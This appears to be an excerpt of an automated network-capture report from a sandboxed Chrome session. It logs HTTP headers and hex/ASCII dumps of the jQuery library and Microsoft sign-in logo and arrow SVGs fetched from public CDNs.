                                                                                                                                                    2025-01-08 08:53:04 UTC1378INData Raw: 20 6d 61 28 61 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 62 29 7b 76 61 72 20 63 3d 62 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3b 72 65 74 75 72 6e 22 69 6e 70 75 74 22 3d 3d 3d 63 26 26 62 2e 74 79 70 65 3d 3d 3d 61 7d 7d 66 75 6e 63 74 69 6f 6e 20 6e 61 28 61 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 62 29 7b 76 61 72 20 63 3d 62 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3b 72 65 74 75 72 6e 28 22 69 6e 70 75 74 22 3d 3d 3d 63 7c 7c 22 62 75 74 74 6f 6e 22 3d 3d 3d 63 29 26 26 62 2e 74 79 70 65 3d 3d 3d 61 7d 7d 66 75 6e 63 74 69 6f 6e 20 6f 61 28 61 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 62 29 7b 72 65 74 75 72 6e 22 66 6f 72 6d 22 69 6e 20 62 3f 62 2e 70 61
                                                                                                                                                    Data Ascii: ma(a){return function(b){var c=b.nodeName.toLowerCase();return"input"===c&&b.type===a}}function na(a){return function(b){var c=b.nodeName.toLowerCase();return("input"===c||"button"===c)&&b.type===a}}function oa(a){return function(b){return"form"in b?b.pa
                                                                                                                                                    2025-01-08 08:53:04 UTC1378INData Raw: 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 4e 61 6d 65 7c 7c 21 6e 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 4e 61 6d 65 28 75 29 2e 6c 65 6e 67 74 68 7d 29 2c 63 2e 67 65 74 42 79 49 64 3f 28 64 2e 66 69 6c 74 65 72 2e 49 44 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 61 2e 72 65 70 6c 61 63 65 28 5f 2c 61 61 29 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 29 3d 3d 3d 62 7d 7d 2c 64 2e 66 69 6e 64 2e 49 44 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 62 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 26 26 70 29 7b 76 61 72 20 63 3d 62 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 61 29
                                                                                                                                                    Data Ascii: getElementsByName||!n.getElementsByName(u).length}),c.getById?(d.filter.ID=function(a){var b=a.replace(_,aa);return function(a){return a.getAttribute("id")===b}},d.find.ID=function(a,b){if("undefined"!=typeof b.getElementById&&p){var c=b.getElementById(a)
                                                                                                                                                    2025-01-08 08:53:04 UTC1378INData Raw: 2e 70 75 73 68 28 22 5b 2a 5e 24 5d 3d 22 2b 4b 2b 22 2a 28 3f 3a 27 27 7c 5c 22 5c 22 29 22 29 2c 61 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 5b 73 65 6c 65 63 74 65 64 5d 22 29 2e 6c 65 6e 67 74 68 7c 7c 71 2e 70 75 73 68 28 22 5c 5c 5b 22 2b 4b 2b 22 2a 28 3f 3a 76 61 6c 75 65 7c 22 2b 4a 2b 22 29 22 29 2c 61 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 5b 69 64 7e 3d 22 2b 75 2b 22 2d 5d 22 29 2e 6c 65 6e 67 74 68 7c 7c 71 2e 70 75 73 68 28 22 7e 3d 22 29 2c 61 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 3a 63 68 65 63 6b 65 64 22 29 2e 6c 65 6e 67 74 68 7c 7c 71 2e 70 75 73 68 28 22 3a 63 68 65 63 6b 65 64 22 29 2c 61 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 61 23 22 2b 75 2b 22 2b 2a 22 29 2e
                                                                                                                                                    Data Ascii: .push("[*^$]="+K+"*(?:''|\"\")"),a.querySelectorAll("[selected]").length||q.push("\\["+K+"*(?:value|"+J+")"),a.querySelectorAll("[id~="+u+"-]").length||q.push("~="),a.querySelectorAll(":checked").length||q.push(":checked"),a.querySelectorAll("a#"+u+"+*").
                                                                                                                                                    2025-01-08 08:53:04 UTC1378INData Raw: 65 29 69 66 28 62 3d 3d 3d 61 29 72 65 74 75 72 6e 21 30 3b 72 65 74 75 72 6e 21 31 7d 2c 42 3d 62 3f 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 69 66 28 61 3d 3d 3d 62 29 72 65 74 75 72 6e 20 6c 3d 21 30 2c 30 3b 76 61 72 20 64 3d 21 61 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 2d 21 62 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 3b 72 65 74 75 72 6e 20 64 3f 64 3a 28 64 3d 28 61 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 61 29 3d 3d 3d 28 62 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 62 29 3f 61 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 62 29 3a 31 2c 31 26 64 7c 7c 21 63 2e 73 6f 72 74 44 65 74 61 63 68 65 64 26 26 62 2e 63 6f 6d 70 61 72 65 44 6f 63 75
                                                                                                                                                    Data Ascii: e)if(b===a)return!0;return!1},B=b?function(a,b){if(a===b)return l=!0,0;var d=!a.compareDocumentPosition-!b.compareDocumentPosition;return d?d:(d=(a.ownerDocument||a)===(b.ownerDocument||b)?a.compareDocumentPosition(b):1,1&d||!c.sortDetached&&b.compareDocu


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    12192.168.2.449757151.101.2.1374433636C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2025-01-08 08:53:04 UTC354OUTGET /jquery-3.3.1.js HTTP/1.1
                                                                                                                                                    Host: code.jquery.com
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                    Accept: */*
                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                    2025-01-08 08:53:04 UTC613INHTTP/1.1 200 OK
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Length: 271751
                                                                                                                                                    Server: nginx
                                                                                                                                                    Content-Type: application/javascript; charset=utf-8
                                                                                                                                                    Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                                                                                                                                    ETag: "28feccc0-42587"
                                                                                                                                                    Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                    Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                    Via: 1.1 varnish, 1.1 varnish
                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                    Date: Wed, 08 Jan 2025 08:53:04 GMT
                                                                                                                                                    Age: 1882049
                                                                                                                                                    X-Served-By: cache-lga21980-LGA, cache-ewr-kewr1740067-EWR
                                                                                                                                                    X-Cache: HIT, HIT
                                                                                                                                                    X-Cache-Hits: 458, 1
                                                                                                                                                    X-Timer: S1736326385.834548,VS0,VE1
                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                    2025-01-08 08:53:04 UTC16384INData Raw: 2f 2a 21 0a 20 2a 20 6a 51 75 65 72 79 20 4a 61 76 61 53 63 72 69 70 74 20 4c 69 62 72 61 72 79 20 76 33 2e 33 2e 31 0a 20 2a 20 68 74 74 70 73 3a 2f 2f 6a 71 75 65 72 79 2e 63 6f 6d 2f 0a 20 2a 0a 20 2a 20 49 6e 63 6c 75 64 65 73 20 53 69 7a 7a 6c 65 2e 6a 73 0a 20 2a 20 68 74 74 70 73 3a 2f 2f 73 69 7a 7a 6c 65 6a 73 2e 63 6f 6d 2f 0a 20 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 20 52 65 6c 65 61 73 65 64 20 75 6e 64 65 72 20 74 68 65 20 4d 49 54 20 6c 69 63 65 6e 73 65 0a 20 2a 20 68 74 74 70 73 3a 2f 2f 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 0a 20 2a 0a 20 2a 20 44 61 74 65 3a 20 32 30 31 38 2d 30 31 2d 32 30 54 31 37
                                                                                                                                                    Data Ascii: /*! * jQuery JavaScript Library v3.3.1 * https://jquery.com/ * * Includes Sizzle.js * https://sizzlejs.com/ * * Copyright JS Foundation and other contributors * Released under the MIT license * https://jquery.org/license * * Date: 2018-01-20T17
                                                                                                                                                    2025-01-08 08:53:04 UTC16384INData Raw: 69 6e 67 2d 69 64 69 6f 6d 73 0a 09 72 63 73 73 65 73 63 61 70 65 20 3d 20 2f 28 5b 5c 30 2d 5c 78 31 66 5c 78 37 66 5d 7c 5e 2d 3f 5c 64 29 7c 5e 2d 24 7c 5b 5e 5c 30 2d 5c 78 31 66 5c 78 37 66 2d 5c 75 46 46 46 46 5c 77 2d 5d 2f 67 2c 0a 09 66 63 73 73 65 73 63 61 70 65 20 3d 20 66 75 6e 63 74 69 6f 6e 28 20 63 68 2c 20 61 73 43 6f 64 65 50 6f 69 6e 74 20 29 20 7b 0a 09 09 69 66 20 28 20 61 73 43 6f 64 65 50 6f 69 6e 74 20 29 20 7b 0a 0a 09 09 09 2f 2f 20 55 2b 30 30 30 30 20 4e 55 4c 4c 20 62 65 63 6f 6d 65 73 20 55 2b 46 46 46 44 20 52 45 50 4c 41 43 45 4d 45 4e 54 20 43 48 41 52 41 43 54 45 52 0a 09 09 09 69 66 20 28 20 63 68 20 3d 3d 3d 20 22 5c 30 22 20 29 20 7b 0a 09 09 09 09 72 65 74 75 72 6e 20 22 5c 75 46 46 46 44 22 3b 0a 09 09 09 7d 0a 0a 09
                                                                                                                                                    Data Ascii: ing-idiomsrcssescape = /([\0-\x1f\x7f]|^-?\d)|^-$|[^\0-\x1f\x7f-\uFFFF\w-]/g,fcssescape = function( ch, asCodePoint ) {if ( asCodePoint ) {// U+0000 NULL becomes U+FFFD REPLACEMENT CHARACTERif ( ch === "\0" ) {return "\uFFFD";}
                                                                                                                                                    2025-01-08 08:53:04 UTC16384INData Raw: 65 20 49 45 20 65 72 72 6f 72 0a 09 2f 2f 20 53 65 65 20 68 74 74 70 73 3a 2f 2f 62 75 67 73 2e 6a 71 75 65 72 79 2e 63 6f 6d 2f 74 69 63 6b 65 74 2f 31 33 33 37 38 0a 09 72 62 75 67 67 79 51 53 41 20 3d 20 5b 5d 3b 0a 0a 09 69 66 20 28 20 28 73 75 70 70 6f 72 74 2e 71 73 61 20 3d 20 72 6e 61 74 69 76 65 2e 74 65 73 74 28 20 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 20 29 29 20 29 20 7b 0a 09 09 2f 2f 20 42 75 69 6c 64 20 51 53 41 20 72 65 67 65 78 0a 09 09 2f 2f 20 52 65 67 65 78 20 73 74 72 61 74 65 67 79 20 61 64 6f 70 74 65 64 20 66 72 6f 6d 20 44 69 65 67 6f 20 50 65 72 69 6e 69 0a 09 09 61 73 73 65 72 74 28 66 75 6e 63 74 69 6f 6e 28 20 65 6c 20 29 20 7b 0a 09 09 09 2f 2f 20 53 65 6c 65 63 74 20 69 73 20 73 65 74 20
                                                                                                                                                    Data Ascii: e IE error// See https://bugs.jquery.com/ticket/13378rbuggyQSA = [];if ( (support.qsa = rnative.test( document.querySelectorAll )) ) {// Build QSA regex// Regex strategy adopted from Diego Periniassert(function( el ) {// Select is set
                                                                                                                                                    2025-01-08 08:53:05 UTC16384INData Raw: 74 79 70 65 20 5d 20 7c 7c 20 5b 5d 3b 0a 09 09 09 09 09 09 09 6e 6f 64 65 49 6e 64 65 78 20 3d 20 63 61 63 68 65 5b 20 30 20 5d 20 3d 3d 3d 20 64 69 72 72 75 6e 73 20 26 26 20 63 61 63 68 65 5b 20 31 20 5d 3b 0a 09 09 09 09 09 09 09 64 69 66 66 20 3d 20 6e 6f 64 65 49 6e 64 65 78 20 26 26 20 63 61 63 68 65 5b 20 32 20 5d 3b 0a 09 09 09 09 09 09 09 6e 6f 64 65 20 3d 20 6e 6f 64 65 49 6e 64 65 78 20 26 26 20 70 61 72 65 6e 74 2e 63 68 69 6c 64 4e 6f 64 65 73 5b 20 6e 6f 64 65 49 6e 64 65 78 20 5d 3b 0a 0a 09 09 09 09 09 09 09 77 68 69 6c 65 20 28 20 28 6e 6f 64 65 20 3d 20 2b 2b 6e 6f 64 65 49 6e 64 65 78 20 26 26 20 6e 6f 64 65 20 26 26 20 6e 6f 64 65 5b 20 64 69 72 20 5d 20 7c 7c 0a 0a 09 09 09 09 09 09 09 09 2f 2f 20 46 61 6c 6c 62 61 63 6b 20 74 6f 20
                                                                                                                                                    Data Ascii: type ] || [];nodeIndex = cache[ 0 ] === dirruns && cache[ 1 ];diff = nodeIndex && cache[ 2 ];node = nodeIndex && parent.childNodes[ nodeIndex ];while ( (node = ++nodeIndex && node && node[ dir ] ||// Fallback to
                                                                                                                                                    2025-01-08 08:53:05 UTC16384INData Raw: 0a 09 09 2f 2f 20 41 64 64 20 65 6c 65 6d 65 6e 74 73 20 74 6f 20 72 65 73 75 6c 74 73 2c 20 74 68 72 6f 75 67 68 20 70 6f 73 74 46 69 6e 64 65 72 20 69 66 20 64 65 66 69 6e 65 64 0a 09 09 7d 20 65 6c 73 65 20 7b 0a 09 09 09 6d 61 74 63 68 65 72 4f 75 74 20 3d 20 63 6f 6e 64 65 6e 73 65 28 0a 09 09 09 09 6d 61 74 63 68 65 72 4f 75 74 20 3d 3d 3d 20 72 65 73 75 6c 74 73 20 3f 0a 09 09 09 09 09 6d 61 74 63 68 65 72 4f 75 74 2e 73 70 6c 69 63 65 28 20 70 72 65 65 78 69 73 74 69 6e 67 2c 20 6d 61 74 63 68 65 72 4f 75 74 2e 6c 65 6e 67 74 68 20 29 20 3a 0a 09 09 09 09 09 6d 61 74 63 68 65 72 4f 75 74 0a 09 09 09 29 3b 0a 09 09 09 69 66 20 28 20 70 6f 73 74 46 69 6e 64 65 72 20 29 20 7b 0a 09 09 09 09 70 6f 73 74 46 69 6e 64 65 72 28 20 6e 75 6c 6c 2c 20 72 65
                                                                                                                                                    Data Ascii: // Add elements to results, through postFinder if defined} else {matcherOut = condense(matcherOut === results ?matcherOut.splice( preexisting, matcherOut.length ) :matcherOut);if ( postFinder ) {postFinder( null, re
                                                                                                                                                    2025-01-08 08:53:05 UTC16384INData Raw: 6f 62 6a 65 63 74 0a 09 09 09 09 09 09 74 68 69 73 5b 20 30 20 5d 20 3d 20 65 6c 65 6d 3b 0a 09 09 09 09 09 09 74 68 69 73 2e 6c 65 6e 67 74 68 20 3d 20 31 3b 0a 09 09 09 09 09 7d 0a 09 09 09 09 09 72 65 74 75 72 6e 20 74 68 69 73 3b 0a 09 09 09 09 7d 0a 0a 09 09 09 2f 2f 20 48 41 4e 44 4c 45 3a 20 24 28 65 78 70 72 2c 20 24 28 2e 2e 2e 29 29 0a 09 09 09 7d 20 65 6c 73 65 20 69 66 20 28 20 21 63 6f 6e 74 65 78 74 20 7c 7c 20 63 6f 6e 74 65 78 74 2e 6a 71 75 65 72 79 20 29 20 7b 0a 09 09 09 09 72 65 74 75 72 6e 20 28 20 63 6f 6e 74 65 78 74 20 7c 7c 20 72 6f 6f 74 20 29 2e 66 69 6e 64 28 20 73 65 6c 65 63 74 6f 72 20 29 3b 0a 0a 09 09 09 2f 2f 20 48 41 4e 44 4c 45 3a 20 24 28 65 78 70 72 2c 20 63 6f 6e 74 65 78 74 29 0a 09 09 09 2f 2f 20 28 77 68 69 63 68
                                                                                                                                                    Data Ascii: objectthis[ 0 ] = elem;this.length = 1;}return this;}// HANDLE: $(expr, $(...))} else if ( !context || context.jquery ) {return ( context || root ).find( selector );// HANDLE: $(expr, context)// (which
                                                                                                                                                    2025-01-08 08:53:05 UTC16384INData Raw: 65 70 74 69 6f 6e 48 6f 6f 6b 20 29 20 7b 0a 09 09 09 09 09 09 09 09 09 09 09 09 6a 51 75 65 72 79 2e 44 65 66 65 72 72 65 64 2e 65 78 63 65 70 74 69 6f 6e 48 6f 6f 6b 28 20 65 2c 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 70 72 6f 63 65 73 73 2e 73 74 61 63 6b 54 72 61 63 65 20 29 3b 0a 09 09 09 09 09 09 09 09 09 09 09 7d 0a 0a 09 09 09 09 09 09 09 09 09 09 09 2f 2f 20 53 75 70 70 6f 72 74 3a 20 50 72 6f 6d 69 73 65 73 2f 41 2b 20 73 65 63 74 69 6f 6e 20 32 2e 33 2e 33 2e 33 2e 34 2e 31 0a 09 09 09 09 09 09 09 09 09 09 09 2f 2f 20 68 74 74 70 73 3a 2f 2f 70 72 6f 6d 69 73 65 73 61 70 6c 75 73 2e 63 6f 6d 2f 23 70 6f 69 6e 74 2d 36 31 0a 09 09 09 09 09 09 09 09 09 09 09 2f 2f 20 49 67 6e 6f 72 65 20 70 6f 73 74 2d 72 65 73 6f 6c 75 74 69 6f 6e 20 65 78 63
                                                                                                                                                    Data Ascii: eptionHook ) {jQuery.Deferred.exceptionHook( e,process.stackTrace );}// Support: Promises/A+ section 2.3.3.3.4.1// https://promisesaplus.com/#point-61// Ignore post-resolution exc
                                                                                                                                                    2025-01-08 08:53:05 UTC16384INData Raw: 68 69 73 2c 20 66 75 6e 63 74 69 6f 6e 28 20 76 61 6c 75 65 20 29 20 7b 0a 09 09 09 76 61 72 20 64 61 74 61 3b 0a 0a 09 09 09 2f 2f 20 54 68 65 20 63 61 6c 6c 69 6e 67 20 6a 51 75 65 72 79 20 6f 62 6a 65 63 74 20 28 65 6c 65 6d 65 6e 74 20 6d 61 74 63 68 65 73 29 20 69 73 20 6e 6f 74 20 65 6d 70 74 79 0a 09 09 09 2f 2f 20 28 61 6e 64 20 74 68 65 72 65 66 6f 72 65 20 68 61 73 20 61 6e 20 65 6c 65 6d 65 6e 74 20 61 70 70 65 61 72 73 20 61 74 20 74 68 69 73 5b 20 30 20 5d 29 20 61 6e 64 20 74 68 65 0a 09 09 09 2f 2f 20 60 76 61 6c 75 65 60 20 70 61 72 61 6d 65 74 65 72 20 77 61 73 20 6e 6f 74 20 75 6e 64 65 66 69 6e 65 64 2e 20 41 6e 20 65 6d 70 74 79 20 6a 51 75 65 72 79 20 6f 62 6a 65 63 74 0a 09 09 09 2f 2f 20 77 69 6c 6c 20 72 65 73 75 6c 74 20 69 6e 20
                                                                                                                                                    Data Ascii: his, function( value ) {var data;// The calling jQuery object (element matches) is not empty// (and therefore has an element appears at this[ 0 ]) and the// `value` parameter was not undefined. An empty jQuery object// will result in
                                                                                                                                                    2025-01-08 08:53:05 UTC16384INData Raw: 20 68 61 6e 64 6c 65 72 2e 68 61 6e 64 6c 65 72 20 29 20 7b 0a 09 09 09 68 61 6e 64 6c 65 4f 62 6a 49 6e 20 3d 20 68 61 6e 64 6c 65 72 3b 0a 09 09 09 68 61 6e 64 6c 65 72 20 3d 20 68 61 6e 64 6c 65 4f 62 6a 49 6e 2e 68 61 6e 64 6c 65 72 3b 0a 09 09 09 73 65 6c 65 63 74 6f 72 20 3d 20 68 61 6e 64 6c 65 4f 62 6a 49 6e 2e 73 65 6c 65 63 74 6f 72 3b 0a 09 09 7d 0a 0a 09 09 2f 2f 20 45 6e 73 75 72 65 20 74 68 61 74 20 69 6e 76 61 6c 69 64 20 73 65 6c 65 63 74 6f 72 73 20 74 68 72 6f 77 20 65 78 63 65 70 74 69 6f 6e 73 20 61 74 20 61 74 74 61 63 68 20 74 69 6d 65 0a 09 09 2f 2f 20 45 76 61 6c 75 61 74 65 20 61 67 61 69 6e 73 74 20 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 20 69 6e 20 63 61 73 65 20 65 6c 65 6d 20 69 73 20 61 20 6e 6f 6e 2d 65 6c 65 6d 65 6e
                                                                                                                                                    Data Ascii: handler.handler ) {handleObjIn = handler;handler = handleObjIn.handler;selector = handleObjIn.selector;}// Ensure that invalid selectors throw exceptions at attach time// Evaluate against documentElement in case elem is a non-elemen
                                                                                                                                                    2025-01-08 08:53:05 UTC16384INData Raw: 09 09 68 61 6e 64 6c 65 4f 62 6a 2e 68 61 6e 64 6c 65 72 0a 09 09 09 29 3b 0a 09 09 09 72 65 74 75 72 6e 20 74 68 69 73 3b 0a 09 09 7d 0a 09 09 69 66 20 28 20 74 79 70 65 6f 66 20 74 79 70 65 73 20 3d 3d 3d 20 22 6f 62 6a 65 63 74 22 20 29 20 7b 0a 0a 09 09 09 2f 2f 20 28 20 74 79 70 65 73 2d 6f 62 6a 65 63 74 20 5b 2c 20 73 65 6c 65 63 74 6f 72 5d 20 29 0a 09 09 09 66 6f 72 20 28 20 74 79 70 65 20 69 6e 20 74 79 70 65 73 20 29 20 7b 0a 09 09 09 09 74 68 69 73 2e 6f 66 66 28 20 74 79 70 65 2c 20 73 65 6c 65 63 74 6f 72 2c 20 74 79 70 65 73 5b 20 74 79 70 65 20 5d 20 29 3b 0a 09 09 09 7d 0a 09 09 09 72 65 74 75 72 6e 20 74 68 69 73 3b 0a 09 09 7d 0a 09 09 69 66 20 28 20 73 65 6c 65 63 74 6f 72 20 3d 3d 3d 20 66 61 6c 73 65 20 7c 7c 20 74 79 70 65 6f 66 20
                                                                                                                                                    Data Ascii: handleObj.handler);return this;}if ( typeof types === "object" ) {// ( types-object [, selector] )for ( type in types ) {this.off( type, selector, types[ type ] );}return this;}if ( selector === false || typeof


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    13192.168.2.449759152.199.21.1754433636C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2025-01-08 08:53:05 UTC420OUTGET /shared/1.0/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc19370e90bd.svg HTTP/1.1
                                                                                                                                                    Host: aadcdn.msftauth.net
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                    Accept: */*
                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                    2025-01-08 08:53:05 UTC738INHTTP/1.1 200 OK
                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                    Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,Content-MD5,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                                                    Age: 24976609
                                                                                                                                                    Cache-Control: public, max-age=31536000
                                                                                                                                                    Content-MD5: nzaLxFgP7ZB3dfMcaybWzw==
                                                                                                                                                    Content-Type: image/svg+xml
                                                                                                                                                    Date: Wed, 08 Jan 2025 08:53:05 GMT
                                                                                                                                                    Etag: 0x8D79A1B9F5E121A
                                                                                                                                                    Last-Modified: Thu, 16 Jan 2020 00:32:52 GMT
                                                                                                                                                    Server: ECAcc (lhc/7936)
                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                    X-Cache: HIT
                                                                                                                                                    x-ms-blob-type: BlockBlob
                                                                                                                                                    x-ms-lease-status: unlocked
                                                                                                                                                    x-ms-request-id: 91dbb46b-a01e-00e9-0b81-7e3c42000000
                                                                                                                                                    x-ms-version: 2009-09-19
                                                                                                                                                    Content-Length: 3651
                                                                                                                                                    Connection: close
                                                                                                                                                    2025-01-08 08:53:05 UTC3651INData Raw: 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 31 30 38 22 20 68 65 69 67 68 74 3d 22 32 34 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 30 38 20 32 34 22 3e 3c 74 69 74 6c 65 3e 61 73 73 65 74 73 3c 2f 74 69 74 6c 65 3e 3c 70 61 74 68 20 64 3d 22 4d 34 34 2e 38 33 36 2c 34 2e 36 56 31 38 2e 34 68 2d 32 2e 34 56 37 2e 35 38 33 48 34 32 2e 34 4c 33 38 2e 31 31 39 2c 31 38 2e 34 48 33 36 2e 35 33 31 4c 33 32 2e 31 34 32 2c 37 2e 35 38 33 68 2d 2e 30 32 39 56 31 38 2e 34 48 32 39 2e 39 56 34 2e 36 68 33 2e 34 33 36 4c 33 37 2e 33 2c 31 34 2e 38 33 68 2e 30 35 38 4c 34 31 2e 35 34 35 2c 34 2e 36 5a 6d 32 2c 31 2e 30 34 39 61 31 2e 32 36 38 2c 31 2e 32 36 38 2c 30
                                                                                                                                                    Data Ascii: <svg xmlns="http://www.w3.org/2000/svg" width="108" height="24" viewBox="0 0 108 24"><title>assets</title><path d="M44.836,4.6V18.4h-2.4V7.583H42.4L38.119,18.4H36.531L32.142,7.583h-.029V18.4H29.9V4.6h3.436L37.3,14.83h.058L41.545,4.6Zm2,1.049a1.268,1.268,0


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    14192.168.2.449760152.199.21.1754433636C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2025-01-08 08:53:05 UTC416OUTGET /shared/1.0/content/images/arrow_left_a9cc2824ef3517b6c4160dcf8ff7d410.svg HTTP/1.1
                                                                                                                                                    Host: aadcdn.msftauth.net
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                    Accept: */*
                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                    2025-01-08 08:53:05 UTC737INHTTP/1.1 200 OK
                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                    Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,Content-MD5,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                                                    Age: 25052007
                                                                                                                                                    Cache-Control: public, max-age=31536000
                                                                                                                                                    Content-MD5: TjUQkZ0p0Y7rbj6LJofS9Q==
                                                                                                                                                    Content-Type: image/svg+xml
                                                                                                                                                    Date: Wed, 08 Jan 2025 08:53:05 GMT
                                                                                                                                                    Etag: 0x8D79A1B9B05915D
                                                                                                                                                    Last-Modified: Thu, 16 Jan 2020 00:32:45 GMT
                                                                                                                                                    Server: ECAcc (lhc/7912)
                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                    X-Cache: HIT
                                                                                                                                                    x-ms-blob-type: BlockBlob
                                                                                                                                                    x-ms-lease-status: unlocked
                                                                                                                                                    x-ms-request-id: 17a39001-701e-0084-32d1-7da17b000000
                                                                                                                                                    x-ms-version: 2009-09-19
                                                                                                                                                    Content-Length: 513
                                                                                                                                                    Connection: close
